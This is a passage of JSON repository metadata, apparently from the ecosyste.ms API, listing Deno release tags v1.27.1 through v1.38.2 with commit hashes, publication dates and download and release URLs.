l":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed